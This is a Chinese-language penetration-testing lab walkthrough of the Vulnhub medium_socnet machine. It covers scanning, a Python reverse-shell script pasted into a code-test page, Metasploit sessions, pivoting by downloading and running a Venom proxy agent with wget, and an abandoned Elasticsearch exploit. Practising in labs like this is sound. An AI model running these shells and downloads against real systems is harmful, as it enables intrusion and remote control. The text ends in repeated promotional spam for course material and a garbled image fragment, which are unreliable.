漏洞靶场实战-Vuluhub medium_socnet

下载安装

Vulnhub 是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地 VM 打开即可，但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容，所以推荐 VirtualBox

本次复现靶场下载地址

下载的是一个 ovf 后缀的文件，打开 VirtualBox，导入

导入完毕后根据需求编辑虚拟机设置

配置 VB 和 VM 的网络链接

因为 Kali 是在 Vmware 上的，还需要与 VirtualBox 的靶机通信

1.将 VirtulBox 靶机网络配置修改成

实战

1.主机发现

arp-scan -l 

根据 VirtualBox 的 mac 地址也能确定 101 就是靶机

端口扫描与服务发现

nmap -sS -sV -T4 -A -p- 192.168.56.101 

存在一个 ssh 端口和一个 5000 http 服务

Werkzeug 是一个专门用来处理 HTTP 和 WSGI 的工具库，可以方便的在 Python 程序中处理 HTTP 协议相关内容

所以可以判断 5000 端口是一个 python 框架的 web 服务

访问主页，通过插件也可以佐证

2.第一台主机漏洞利用

现在的思路

1.web 信息收集然后漏洞利用1.目录扫描2.Python ssti 漏洞
2.ssh 端口爆破

目录扫描

python .\dirsearch.py -u http://192.168.56.101:5000/ 

是一个代码测试页可以执行代码，尝试反弹 shell，推荐一个反弹 shell 的网站 www.revshells.com/

拿shell

方法一：NC监听

因为这里是直接执行代码，所以使用以下代码即可

import socket,os,subprocess
RHOST='192.168.56.102'# Change it
RPORT=4444# Change it
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# 创建一个TCP-socket对象
s.connect((RHOST,RPORT)) 	# 连接攻击者
os.dup2(s.fileno(),0)		# 复制链接符
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])# 创建子进程调用SHELL 

在 Kali 上监听 4444 端口，将上面的粘贴到网页代码，点击 test code，接到 shell

执行 whoami 命令还是一个 root 权限用户，但是目录下有个 Dockerfile，推测可能是在 docker 容器中

判断是否是为 docker 环境

1.检查根目录下是否存在.dockerenv文件

也就是说我们现在拿到的是一个 docker 容器内的用户 shell，不是真实的服务器，所以接下来就要尝试横向移动是在不行再容器逃逸

方法二：MSF shell

为了方便操作，这里反弹一个 shell 到 MSF，首先在 kali msf 开启监听（其实就是代替 nc）

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set lhost 192.168.56.102
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > exploit 

靶机还是刚才的脚本就可以，整理好的 msf payloads

这样是实现了 Linux 环境下无文件上线 CS，Windows 的话用 powershell 就行

但是需要注意的是这是一个 Shell Banner 也就是只有一个 shell 不能用 msf 的其他功能，需要将它升级一下

command-shell-to-meterpreter

1.在 shell 中执行 backgroup 命令退回 msf 主页

2.使用命令提升 shell

sessions -u id 

执行完毕后可以看到多了一个 session

还有其他方法：链接

再进入 session 中即可，顺便测试下刚说的 checkcontainer 模块

meterpreter > run post/linux/gather/checkcontainer 

横向移动

**方法一：MSF

1.首先进行信息收集，当然我这里直接用的 msf 的命令，手工的话可以看这篇文章

• 系统信息和路由表信息

run autoroute -s 172.17.0.0/16
run autoroute -p 

新版中可以用 addroute 命令，用法发生了变化，使用这个命令来查看用法

info post/multi/manage/autoroute 

这样的话就添加了一条路由，但是仅这样是不行的，还有添加代理

background 之后使用 socks4a 模块

use auxiliary/server/socks_proxy
set SRVPORT 10044 

我用的是 msf6，msf 的话可以使用

use auxiliary/server/socks4a 

3.修改配置文件

vi /etc/proxychains.conf 

然后进行扫描

proxychains nmap -sT -Pn 10.0.0.2 

但是我这里不知道什么原因失败了，有篇文章介绍到可以上传单文件版 nmap 但是我没有找到 www.anquanke.com/post/id/204…

方法二：工具代理

只能手动使用工具：Venom 进行代理

1.使用命令进行内网探测

for i in $(seq 1 254);do ping -c 1 172.17.0.$i;done 

2.搭建代理

使用这个工具，项目地址：github.com/Dliv3/Venom…

首先在 kali 启动服务端

./admin_linux_x64 -lport 9999 

启动后在 kali 上使用 python 开启临时的 http 服务，然后在目标机器上通过 wget 命令将客户端下载到本地

python -m http.server 8080 

进入 shell 中，执行以下命令

wget http://192.168.56.102:8080/agent_linux_x64
chmod +x agent_linux_x64 
./agent_linux_x64 -rhost 192.168.56.102 -rport 9999#启动客户端 

服务端也连接成功，获取到了一个会话，然后我们进入这个会话，然后开启一个 socks 代理

开启代理后就可以对内网机器进行操作

3.代理工具还是 proxychains，首先修改配置文件

vim /etc/proxychains.conf 

依次探测内网主机

proxychains nmap -sV -sT 172.17.0.3 

3.第二台主机漏洞利用

漏洞发现

发现内网主机 172.17.0.3 发现开放了 9200 端口，elasticsearch 服务，是一个基于 Lucene 的搜索服务器，使用 Java 语言开发的

简单使用命令访问下看看啥回显，找到版本号1.4.2

搜索漏洞

searchsploit	elasticsearch 

通过 MSF 搜索 EXP

use exploit/multi/elasticsearch/search_groovy_script 

确定存在漏洞

漏洞利用

就用第一个脚本，脚本位置在

/usr/share/exploitdb/exploits/linux/remote/36337.py 

proxychains python2 36337.py 172.17.0.3 

又又又遇到问题了，人麻了，而且问题越扯越多，弃坑，用的环境太复杂了，因为我的靶机在 virtualBox 设置的仅主机模式所以不通外网而这里需要请求 dns 直接寄这就是 virutalbox 和 VMware 都用的麻烦，kali 不知道咋回事还巨卡

像下图这样才可以，我这里不通网不行

可以看底下的两篇文章，很棒

参考

• vulnhub靶场medium_socnet靶机渗透过程
  1fbpfcp/d03effc6a9254240a9acb630bca48f61~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image" style=“margin: auto” />

可以看底下的两篇文章，很棒

参考

• vulnhub靶场medium_socnet靶机渗透过程
• Vulnhub | Social Network 渗透靶机 学习网络安全技术的方法无非三种:

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。

第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

第三种就是去找培训。

接下来，我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础？这是一个争议比较大的问题，有的人会建议先学编程，而有的人会建议先学计算机基础，其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说，学习编程或者计算机基础对他们来说都有一定的难度，并且花费时间太长。

第一阶段：基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分，俗话说：基础不劳，地动山摇

第二阶段：web渗透

学习基础 时间：1周 ~ 2周：

① 了解基本概念：（SQL注入、XSS、上传、CSRF、一句话木马、等）为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透，学一学案例的思路，每一个站点都不一样，所以思路是主要的。
③ 学会提问的艺术，如果遇到不懂得要善于提问。

配置渗透环境 时间：3周 ~ 4周：

① 了解渗透测试常用的工具，例如（AWVS、SQLMAP、NMAP、BURP、中国菜刀等）。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。

渗透实战操作 时间：约6周：

① 在网上搜索渗透实战案例，深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试，推荐DWVA，SQLi-labs，Upload-labs，bWAPP。
③ 懂得渗透测试的阶段，每一个阶段需要做那些动作：例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入，寻找绕过waf的方法，制作自己的脚本。
⑤ 研究文件上传的原理，如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用（IIS、Nignix、Apache）等，参照：上传攻击框架。
⑥ 了解XSS形成原理和种类，在DWVA中进行实践，使用一个含有XSS漏洞的cms，安装安全狗等进行测试。
⑦ 了解一句话木马，并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限，Google关键词：提权

以上就是入门阶段

第三阶段：进阶

已经入门并且找到工作之后又该怎么进阶？详情看下图

给新手小白的入门建议：
新手入门学习最好还是从视频入手进行学习，视频的浅显易懂相比起晦涩的文字而言更容易吸收，这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦！

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！